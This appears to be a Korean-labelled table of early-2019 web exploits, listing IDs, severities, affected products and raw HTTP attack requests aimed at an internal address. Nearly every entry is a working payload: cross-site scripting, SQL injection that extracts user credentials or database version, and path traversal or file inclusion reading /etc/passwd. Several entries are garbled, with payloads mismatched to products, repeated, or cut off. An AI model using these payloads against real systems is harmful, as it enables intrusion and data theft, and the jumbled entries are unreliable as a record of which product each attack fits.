/10.0.100.24/categorysearch.php?cateid=<scRiPt>alert(1)</ScrIpT>HTTP/1.1Host: 10.0.100.24:1004Cookie: qdPM8=se4u27u8rbs04mo61f138b5k3d; sidebar_closed=1

Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)AppleWebKit/537.21 (KHTML,like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*

Ask Expert ScriptAsk ExpertScript 3.0.5

2019-02-19 46426 SQL Injection 하 하Ask Expert Script 3.0.5 - SQL

Injection

POST /10.0.100.24/list-details.php? HTTP/1.1Host: 10.0.100.24:1004Content-Length: 45Content-Type: application/x-www-form-urlencodedReferer: http://localhost/qdPM/

Cookie: qdPM8=se4u27u8rbs04mo61f138b5k3d; sidebar_closed=1Host: localhostConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)AppleWebKit/537.21(KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*

view=select * FROM users WHERE login = "victor" ANDpassword="123"

Ask Expert ScriptAsk ExpertScript 3.0.5

2019-02-19 46425 Directory Traversal 중 하

Zoho ManageEngine Netflow

Analyzer Professional 7.0.0.2 -

Path Traversal

bussAlert=2&customDev=truer93f1%22%3e%3cscript%3ealert(1)%3c%2fscript%3efc8z7&bussAlert=truecustomDev=2&customDev=truer93f1%22%3e%3cscript%3ealert(1)%3c%2fscript%3efc8z7&bussAlert=trueselSource=2&customDev=truer93f1%22%3e%3cscript%3ealert(1)%3c%2fscript%3efc8z7&bussAlert=true

Zoho ManageEngineNetflow

ZohoManageEngine

NetflowAnalyzer

Professional7.0.0.2

2019-02-19 46425 XSS 하 하

Zoho ManageEngine Netflow

Analyzer Professional 7.0.0.2 -


bussAlert=2&customDev=truer93f1%22%3e%3cscript%3ealert(1)%3c%2fs

cript%3efc8z7&bussAlert=true

customDev=2&customDev=truer93f1%22%3e%3cscript%3ealert(1)%3c%2fscript%3efc8z7&bussAlert=trueselSource=2&customDev=truer93f1%22%3e%3cscript%3ealert(1)%3c%2fscript%3efc8z7&bussAlert=true

Zoho ManageEngineNetflow AnalyzerProfessional

Zoho

ManageEngine

NetflowAnalyzer

Professional7.0.0.2

2019-02-19 46424 SQL Injection 하 하 XAMPP 5.6.8 - SQL Injection

POST /10.0.100.24/xampp/cds.php? HTTP/1.1

Host: 10.0.100.24:1004Content-Length: 45Content-Type: application/x-www-form-urlencodedReferer: http://localhost/qdPM/Cookie: qdPM8=se4u27u8rbs04mo61f138b5k3d; sidebar_closed=1

Host: localhostConnection: Keep-alive

Accept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)

AppleWebKit/537.21(KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*

interpret=<script>alert("XSS")</script>&titel=XSS&jahr=1984

XAMPP XAMPP 5.6.8

2019-02-19 46424 XSS 하 하XAMPP 5.6.8 - Persistent Cross-

Site Scripting

GET /10.0.100.24/xampp/cds-fpdf.php?interpret=SQLi&titel=SQLi&jahr=1984%20%20AND%20sleep%285%29 HTTP/1.1Host: 10.0.100.24:1004Cookie: qdPM8=se4u27u8rbs04mo61f138b5k3d; sidebar_closed=1Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)AppleWebKit/537.21 (KHTML,like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*

XAMPP XAMPP 5.6.8

2019-02-19 46423 SQL Injection 하 하 eDirectory - SQL Injection

POST /10.0.100.24/xampp/cds-fpdf.php? HTTP/1.1Host: 10.0.100.24:1004Content-Length: 45Content-Type: application/x-www-form-urlencodedReferer: http://localhost/qdPM/Cookie: qdPM8=se4u27u8rbs04mo61f138b5k3d; sidebar_closed=1Host: localhost

Connection: Keep-aliveAccept-Encoding: gzip,deflate

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)AppleWebKit/537.21

(KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*

interpret=SQLi&titel=SQLi&jahr=1984%20%20AND%20sleep%285%29

eDirectory eDirectory

2019-02-19 46420 XSS 하 하

Zuz Music 2.1 -

'zuzconsole/___contact '


POST /10.0.100.24/gmusic/zuzconsole/___contact HTTP/1.1Host: 10.0.100.24:1004Connection: closeContent-Length: 155Accept: application/json, text/plain, */*Origin: https://demos.zuz.host

User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36(KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36Content-Type: application/json;charset=UTF-8Referer: https://server/gmusic/contact

Accept-Encoding: gzip, deflateX-XSS-Protection: 0

{"type":"general","name":"<script>alert(0)</script>","mail":"[email protected]","subject":"<script>alert(1)</script>","message":"<script>alert(2)</script>"}

Zuz Music Zuz Music 2.1

2019-02-19 46419 SQL Injection 하 하Listing Hub CMS 1.0 -

'pages.php id' SQL Injection

GET/10.0.100.24/pages.php?id=2%27%20AND%20(SELECT%204588%20FROM(SELECT%20COUNT(*),CONCAT(0x3a3a,user(),0x3a3a,database(),0x3a3a,version(),0x3a3a,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)--%20- HTTP/1.1

Listing Hub CMSListing Hub

CMS 1.0


Find a Place CMS Directory 1.5

- 'assets/external/data_2.php

cate' SQL Injection

POST /10.0.100.24/find/assets/external/data_2.php HTTP/1.1Host: 10.0.100.24:1004Connection: closeContent-Length: 251Accept: application/json, text/javascript, */*; q=0.01Origin: https://themerig.comX-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36(KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36

Content-Type: application/x-www-form-urlencoded; charset=UTF-8Referer: https://server/find/index.phpAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9

cate=2.9') UNION ALL SELECTNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,concat(username,0x3a3a,password,0x3a3a,email),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM users limit 1-- -

Find a Place CMS

Directory

Find a Place

CMS Directory1.5




2019-02-20 46429 XSS 하 하HotelDruid 2.3 - Cross-Site

Scripting

GET /10.0.100.24/hoteldruid/visualizza_tabelle.php?nsextt=x"onmouseover=alert(0x000981) x=" HTTP/1.1Host: 10.0.100.24:1004Cookie: qdPM8=se4u27u8rbs04mo61f138b5k3d; sidebar_closed=1Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)AppleWebKit/537.21 (KHTML,like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*

GET/10.0.100.24/hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione=&tipo_tabella=prenotazioni&subtotale_selezionate=1&num_cambia_pren=1&cerca_id_passati=1&cambia1=3134671"onmouseover="alert(8562604) HTTP/1.1Host: 10.0.100.24:1004

Cookie: qdPM8=se4u27u8rbs04mo61f138b5k3d; sidebar_closed=1Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)AppleWebKit/537.21 (KHTML,like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*

HotelDruidHotelDruid

2.3

2019-02-21 46440 SQL Injection 중 하 EI-Tube 3 - SQL Injection

POST /10.0.100.24/search?q=-999%22+union+select+1,user(),3,4,5,version()+%23 HTTP/1.1Host: 10.0.100.24:1004Connection: closeContent-Length: 251Accept: application/json, text/javascript, */*; q=0.01Origin: https://themerig.comX-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36(KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Referer: https://server/find/index.php

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.9

cate=2.9') UNION ALL SELECTNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,concat(username,0x3a3a,password,0x3a3a,email),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,N

ULL,NULL FROM users limit 1-- -

EI-Tube EI-Tube 3

2019-02-22 46450 Directory Traversal 하 중Micro Focus Filr 3.4.0.217 - Path

Traversal

GET/10.0.100.24/ssf/s/viewFile?binderId=44&entryId=1&entityType=folderEntry&fileId=8a82ada06851d92d016852b727f26b1b&viewType=image&filename=../../../../../../../../../../../etc/passwdHTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0)Gecko/20100101Firefox/60.0Accept: */*Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflateCookie: JSESSIONID=803689DA9BA5DA9CBA2B7DD246A50531Connection: close

Micro Focus FilrMicro Focus

Filr3.4.0.217

2019-02-25 46457 SQL Injection 하 하Advance Gift Shop Pro Script


GET/10.0.100.24/?category=&s=1%20and%20extractvalue(rand(),concat(0x7e,version()))&search_posttype=product HTTP/1.1

Advance Gift ShopPro Script

Advance GiftShop Pro

Script 2.0.3

2019-02-25 46456 SQL Injection 하 하News Website Script 2.0.5 -

SQL Injection

GET/10.0.100.24/index.php/show/news/11%20and%201=0/Sports/january-25-2018/Pogba-still-has-to-improve-Allegri HTTP/1.1

News WebsiteScript

News WebsiteScript 2.0.5

2019-02-25 46455 XSS 하 하PHP Ecommerce Script 2.0.6 -

Cross-Site Scripting/10.0.100.24/?s=<scRiPt>alert(1)</ScrIpT>

PHP EcommerceScript

PHP EcommerceScript 2.0.6

2019-02-25 46455 SQL Injection 하 하PHP Ecommerce Script 2.0.6 -

SQL Injection

GET/10.0.100.24/?s=1%20and%20extractvalue(rand(),concat(0x7e,version())) HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)


text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflateCookie: PHPSESSID=9832af9c6649b4b918850c9c898e05dcDNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1

PHP Ecommerce

Script

PHP Ecommerce

Script 2.0.6

2019-02-28 46467 SQL Injection 하 하Joomla! Component J2Store <


POST /10.0.100.24/index.php? HTTP/1.1Host: 10.0.100.24:1004Content-Length: 139Content-Type: application/x-www-form-urlencodedConnection: Keep-aliveAccept-Encoding: gzip,deflate

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)AppleWebKit/537.21(KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*

option=com_j2store&view=product&task=update&product_option[j]=%27%22%3E2&product_qty=1&product_id=XX&option=com_j2store&ajax=0&_=XXXXXXXXXX

Joomla! ComponentJ2Store

Joomla!

ComponentJ2Store <3.3.7


Simple Online Hotel

Reservation System - SQL

Injection

GET /10.0.100.24/admin/edit_room.php?room_id=-4%27union%20select%201,2,3,4%20--%20- HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: PHPSESSID=a5i6r78j7v22ql1qrvtsampff6DNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1

Simple OnlineHotel Reservation

System

Simple OnlineHotel

ReservationSystem




2019-03-04 46498 XSS 하 중

Fiberhome AN5506-04-F

RP2669 - Persistent Cross-Site

Scripting

POST /10.0.100.24/goform/setUser HTTP/1.1Host: 10.0.100.24:1004Content-Length: 101Cache-Control: max-age=0Origin: http://192.168.1.1Upgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8Referer: http://192.168.1.1/management/account_admin.aspAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: loginName=admin

Connection: close

account_user=%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%58%53%53%22%29%3c%2f%73%63%72%69%70%74%3e&account_pwd=password123&account_pwd2=password123&btnApply1=Apply&curIndex=new

FiberhomeFiberhome

AN5506-04-FRP2669

POST /10.0.100.24/s/admin/entries/news/258-craft-cms-3-1-12-pro-xss-test HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0)Gecko/20100101 Firefox/65.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 1936DNT: 1Connection: close

CRAFT_CSRF_TOKEN=deccdc1b2ef00dd8580186987fe54e3cdf92305c6150cffb523f392540a2d4aba%3A2%3A%7Bi%3A0%3Bs%3A16%3A%22CRAFT_CSRF_TOKEN%22%3Bi%3A1%3Bs%3A208%3A%22iuw8Yd67pzxgeP7PrY9zqL5nYEB0Uor6JeS779fM%7Cf42be7b0c353ba14582c1e682a6150947da39c970d31f5cbc3ddc4c0bbe14608iuw8Yd67pzxgeP7PrY9zqL5nYEB0Uor6JeS779fM%7C1%7C%242a%2413%245j8bSRoKQZipjtIg6FXWR.kGRR3UfCL.QeMIt2yTRH1.hCNHLQKtq%22%3B%7D;1031b8c41dfff97a311a7ac99863bdc5_identity=9804f2668edfba25525881f3badabcfe5adb1d71f4dcb4504daee11a78bc94a3a%3A2%3A%7Bi%3A0%3Bs%3A41%3A%221031b8c41dfff97a311a7ac99863bdc5_identity%22%3Bi%3A1%3Bs%3A197%3A%22%5B%221%22%2C%22%5B%5C%22dQCnIq3FbN0KsbTg8nbPQxV3JvEWqbBzqXjf0nwbvJDN0LjgArYGZe4WaYfo3AiYzm8CaeKPjT9CUw_8mnAd_D89-nf39hYXRRoq%5C%22%2Cnull%2C%5C%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A65.0%29+Gecko%2F20100101+Firefox%2F65.0%5C%22%5D%22%2C3600%5D%22%3B%7D;1031b8c41dfff97a311a7ac99863bdc5_username=53dcb198f73d427f239351d0c5ac1bb1e4fbba88fab3cc128854b0232098896da%3A2%3A%7Bi%3A0%3Bs%3A41%3A%221031b8c41dfff97a311a7ac99863bdc5_username%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3B%7DUpgrade-Insecure-Requests: 1

2019-03-04 46495 XSS 중 중Bolt CMS 3.6.4 - Cross-Site

Scripting

POST /bolt/editcontent/pages HTTP/1.1Host: bolt-up3x24.bolt.dockerfly.comUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0)Gecko/20100101 Firefox/65.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 562DNT: 1Connection: closeUpgrade-Insecure-Requests: 1

content_edit%5B_token%5D=u1EA_Zhor_EwrIyqIt-PLLK02DccGgZDDWFQm1325_8&editreferrer=&contenttype=pages&title=%22%3E%3Cscript%3Ealert%28%22ismailtasdelen%22%29%3C%2Fscript%3E&

slug=script-alert-ismailtasdelen-script&image%5Bfile%5D=2019-03%2Fimg-src-x-onerror-prompt-1-.png&files%5B%5D=&teaser=%3Cp%3EBolt+3.6.4+CMS%3C%2Fp%3E%0D%0A&body=%3Cp%3EBolt+3.6.4+CMS%3C%2Fp%3E%0D%0A&template=&taxonomy%5Bgroups%5D%5B%5D=&taxonomy-order%5Bgroups%5D=0&id=&status=draft&datepublish=2019-03-04+08%3A24%3A47&datedepublish=&ownerid=1&_live-editor-preview=&content_edit%5Bsave%5D=1

BoltBolt CMS3.6.4

2019-03-04 46494 Directory Traversal 중 하

MarcomCentral FusionPro VDP

Creator < 10.0 - Directory

Traversal

POST /10.0.100.24/bolt/editcontent/pages HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0)Gecko/20100101 Firefox/65.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 562DNT: 1

Connection: close

content_edit%5B_token%5D=u1EA_Zhor_EwrIyqIt-PLLK02DccGgZDDWFQm1325_8&editreferrer=&contenttype=pages&title=%22%3E%3Cscript%3Ealert%28%22ismailtasdelen%22%29%3C%2Fscript%3E&slug=script-alert-ismailtasdelen-script&image%5Bfile%5D=2019-03%2Fimg-src-x-onerror-prompt-1-.png&files%5B%5D=&teaser=%3Cp%3EBolt+3.6.4+CMS%3C%2Fp%3E%0D%0A&body=%3Cp%3EBolt+3.6.4+CMS%3C%2Fp%3E%0D%0A&template=&taxonomy%5Bgroups%5D%5B%5D=&taxonomy-order%5Bgroups%5D=0&id=&status=draft&datepublish=2019-03-04+08%3A24%3A47&datedepublish=&ownerid=1&_live-editor-preview=&content_edit%5Bsave%5D=1

MarcomCentral

MarcomCentral

FusionPro VDPCreator <

10.0

2019-03-04 46482 SQL Injection 중 중OOP CMS BLOG 1.0 - Multiple

SQL Injection

# http://localhost/[PATH]/search.php?search=1[SQLi]&submit=Search# http://localhost/[PATH]/post.php?id=17 [SQLi]# http://localhost/[PATH]/posts.php?id=4 [SQLi]# http://localhost/[PATH]/page.php?pageid=8 [SQLi]# http://localhost/[PATH]/admin/viewUser.php?userid=34 [SQLi]

# http://localhost/[PATH]/admin/replayMsg.php?msgid=4 [SQLi]

OOP CMS BLOGOOP CMS BLOG

1.0

2019-03-04 46481 SQL Injection 하 하elFinder 2.1.47 - 'PHP

connector' Command Injection

GET/10.0.100.24/php/connector.minimal.php?target=%s&width=539&heigh

t=960&degree=180&quality=100&bg=&mode=rotate&cmd=resize&reqid=169323550af10c HTTP/1.1

elFinderelFinder2.1.47

Craft CMS 3.1.12 Pro - Cross-

Site ScriptingCraft

Craft CMS3.1.12 Pro

2019-03-04 46496 XSS 중 중





OpenDocMan 1.3.4 -

'search.php where' SQL

Injection

GET/10.0.100.24/opendocman/search.php?submit=submit&sort_by=id&where=[SQL Inject Here]&sort_order=asc&keyword=TrainingManual&exact_phrase=on HTTP/1.1

OpenDocManOpenDocMan

1.3.4

2019-03-07 46482 SQL Injection 중 중Kados R10 GreenBee - Multiple

SQL Injection

GET /10.0.100.24/search.php?search=1 [SQLi]&submit=SearchHTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0)Gecko/20100101 Firefox/65.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeCookie: _ga=GA1.2.1239644041.1549987630;

_gid=GA1.2.1694605918.1549987630Upgrade-Insecure-Requests: 1

/post.php?id=17 [SQLi]/posts.php?id=4 [SQLi]/page.php?pageid=8 [SQLi]/admin/viewUser.php?userid=34 [SQLi]/admin/replayMsg.php?msgid=4 [SQLi]

KadosKados R10GreenBee

2019-03-08 46517 XSS 중 중

OrientDB 3.0.17 GA Community

Edition - Cross-Site Request

Forgery / Cross-Site Scripting

POST /document/demodb/-1:-1 HTTP/1.1Host: 192.168.2.101:2480User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)Gecko/20100101 Firefox/65.0Accept: application/json, text/plain, */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: http://192.168.2.101:2480/studio/index.htmlX-Requested-With: XMLHttpRequestContent-Type: application/json;charset=utf-8Content-Length: 133DNT: 1

Connection: closeCookie: CockpitLang=en-us; OSESSIONID=OS1551978095783-8372032249854396825

{"@class":"OUser","@version":0,"@rid":"#-1:-

1","name":"test<script>alert(1)</script>","password":"test","roles":[],"status":"ACTIVE"}

OrientDB

OrientDB3.0.17 GACommunityEdition

2019-03-13 46538 XSS 하 하

pfSense 2.4.4-p1 (HAProxy

Package 0.59_14) - Persistent


POST /10.0.100.24/haproxy/haproxy_listeners_edit.php HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0)Gecko/20100101 Firefox/65.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: https://localhost/XXX/s/admin/entries/news/258-craft-cms-3-1-12-pro-xss-testContent-Type: application/x-www-form-urlencoded

Description="><script>alert("test")</script>

pfSense

pfSense

2.4.4-p1(HAProxy

Package0.59_14)

2019-03-13 46537 LFI 중 하

WordPress Plugin GraceMedia

Media Player 1.0 - Local File

Inclusion

/wordpress/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd

WordPress Plugin

WordPressPlugin

GraceMediaMedia Player

1.0

2019-03-15 46549 XSS 하 중Vembu Storegrid Web Interface

4.4.0 - Multiple Vulnerabilities

https://xxxxxxxx.xx:6061/interface/registercustomer/onlineregsuccess.php?cn=</font><script>alert(1);</script><font>&result=https://xxxxxxxx.xx:6061//interface/registercustomer/onlineregsuccess.php?cn=</font><script>alert(1);</script><font>&result=https://xxxxxxxx.xx:6061/interface/registercustomer/onlineregsuccess.php?cn=</font><script>alert(1);</script><font>&result=https://xxxxxxxxx.xx:6061/interface/registerreseller/onlineregfailure.php?cn=gar&result=</font><script>alert(1);</script><font>https://xxxxxxxxx.xx:6061/interface/registerclient/onlineregfailure.php?cn=gar&result=</font><script>alert(1);</script><font>https://xxxxxxxx.xx:6061/interface/registercustomer/onlineregfai

lure.php?cn=gar&result=</font><script>alert(1);</script><font>

Vembu StoregridWeb Interface

VembuStoregrid Web

Interface4.4.0

2019-03-15 46548 SQL Injection 중 상ICE HRM 23.0 - Multiple

Vulnerabilities

GET/icehrmv23OS/app/data.php?t=Employee&sm=%7B%22nationality%22:[%22Nationality%22,%22id%22,%22name%22],%22ethnicity%22:[%22Ethnicity%22,%22id%22,%22name%22],%22immigration_status%22:[%22ImmigrationStatus%22,%22id%22,%22name%22],%22employment_status%22:[%22EmploymentStatus%22,%22id%22,%22name%22],%22job_title%22:[%22JobTitle%22,%22id%22,%22name%22],%22pay_grade%22:[%22PayGrade%22,%22id%22,%22name%22],%22country%22:[%22Country%22,%22code%22,%22name%22],%22province%22:[%22Province%22,%22id%22,%22name%22],%22department%22:[%22CompanyStructure%22,%22id%22,%22title%22],%22super

visor%22:[%22Employee%22,%22id%22,%22first_name%20last_name%22]%7D&cl=[%22id%22,%22image%22,%22employee_id%22,%22first_name%22,%22last_name%22,%22mobile_phone%22,%22department%22,%22gender%22,%22supervisor%22]&ft=%7B%22status%22:%22Active%22%7D&ob=1%20%2b%

20((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A))%2f*%27XOR(((SELE

CT%201%20FROM%20(SELECT%20SLEEP(25))A)))OR%27%7c%22XOR(((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)))OR%22*%2f

ICE HRM ICE HRM 23.0

2019-03-15 46545 SQL Injection 중 상 NetData 1.13.0 - HTML Injection

GET /124.53.7.10/?username=test&password=passwordexampleHTTP/1.1Host: 124.53.7.10:5000Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8Referer: http://localhost:19999/Accept-Encoding: gzip, deflateAccept-Language: es-ES,es;q=0.9,en;q=0.8

NetDataNetData1.13.0

2019-03-18 46555 SQL Injection 하 상TheCarProject 2 - Multiple SQL

Injection

GET /124.53.7.10/TheCarProject/cp/includes/loaditem.php?man_id=-1

or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT

COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))xFROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a) HTTP/1.1Content-Length: 364

TheCarProjectTheCarProject

2




2019-03-19 46563 SQL Injection 중 하Netartmedia Real Estate Portal

5.0 - SQL Injection

POST /124.53.7.10/index.php HTTP/1.1Host:124.53.7.10:5000Connection: CloseAccept: text/html, application/xhtml+xml, */*Accept-Language: ko-KRUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2;WOW64; Trident/6.0)Content-Type: multipart/form-data;Content-Length: 873

ProceedSend=1&mod=forgotten_password&user_email=0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z' OR SLEEP(5)#

Netartmedia RealEstate

NetartmediaReal EstatePortal 5.0

2019-03-19 46562 SQL Injection 중 하Netartmedia PHP Mall 4.1 - SQL

Injection

(GET)id=1 AND SLEEP(5)&item=&lang=en&mod=details

(POST)

Email=0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z' OR SLEEP(5)AND 'tOoX'='tOoX&Password=g00dPa$$w0rD&lang=en

NetartmediaNetartmediaPHP Mall 4.1

2019-03-19 46560 SQL Injection 중 하Netartmedia Event Portal 2.0 -

'Email' SQL Injection

Email='||(SELECT 0x59685353 FROM DUAL WHERE 7114=7114 ANDSLEEP(5))||'

NetartmediaNetartmediaEvent Portal

2.0

2019-03-19 46559 SQL Injection 하 상eNdonesia Portal 8.7 - Multiple

Vulnerabilities

/endonesia87/banners.php?op=click&bid=-1 or1=1 and (SELECT 1 and ROW(1,1)>(SELECTCOUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))xFROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)

eNdonesiaeNdonesiaPortal 8.7

2019-03-19 46558 XSS 하 하MyBB Upcoming Events Plugin

1.32 - Cross-Site Scriptingname = <script>alert('XSS')</script> MyBB

MyBB UpcomingEvents Plugin

1.32

2019-03-19 46557 XSS 하 중Gila CMS 1.9.1 - Cross-Site

Scripting

GET /10.0.100.24/?search=<--`<img/src=` onerror=confirm``> --!>HTTP/1.1Host: 10.0.100.24:1004

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: PHPSESSID=a5i6r78j7v22ql1qrvtsampff6DNT: 1


GilaGila CMS1.9.1

2019-03-20 46582 SQL Injection 하 중Netartmedia Deals Portal -

'Email' SQL Injection

POST /10.0.100.24/loginaction.php HTTP/1.1Host: 10.0.100.24User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0)Gecko/20100101 Firefox/45.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-aliveContent-Type: application/x-www-form-urlencoded

Content-Length: 59

Email=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&Password=g00dPa%24%24w0rD&lang=en&mod=login

NetartmediaNetartmediaDeals Portal

2019-03-20 46579 SQL Injection 하 중202CMS v10beta - Multiple SQL

Injection

POST /10.0.100.24/202cms10beta/index.php HTTP/1.1Host: 10.0.100.24User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0)Gecko/20100101 Firefox/45.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 59

log_user=1+%2b+((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2f*%27XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%27%7c%22XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%22*%2f

202CMS v10beta202CMSv10beta

2019-03-20 46577 SQL Injection 하 하Netartmedia PHP Business

Directory 4.2 - SQL Injection

POST /10.0.100.24/USERS/loginaction.php HTTP/1.1Host: 10.0.100.24User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0)Gecko/20100101 Firefox/45.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 59


Netartmedia

Netartmedia

PHP BusinessDirectory 4.2

2019-03-20 46576 SQL Injection 하 중Netartmedia PHP Dating Site -

SQL Injection

POST /10.0.100.24/loginaction.php HTTP/1.1Host: 10.0.100.24User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0)Gecko/20100101 Firefox/45.0Accept:

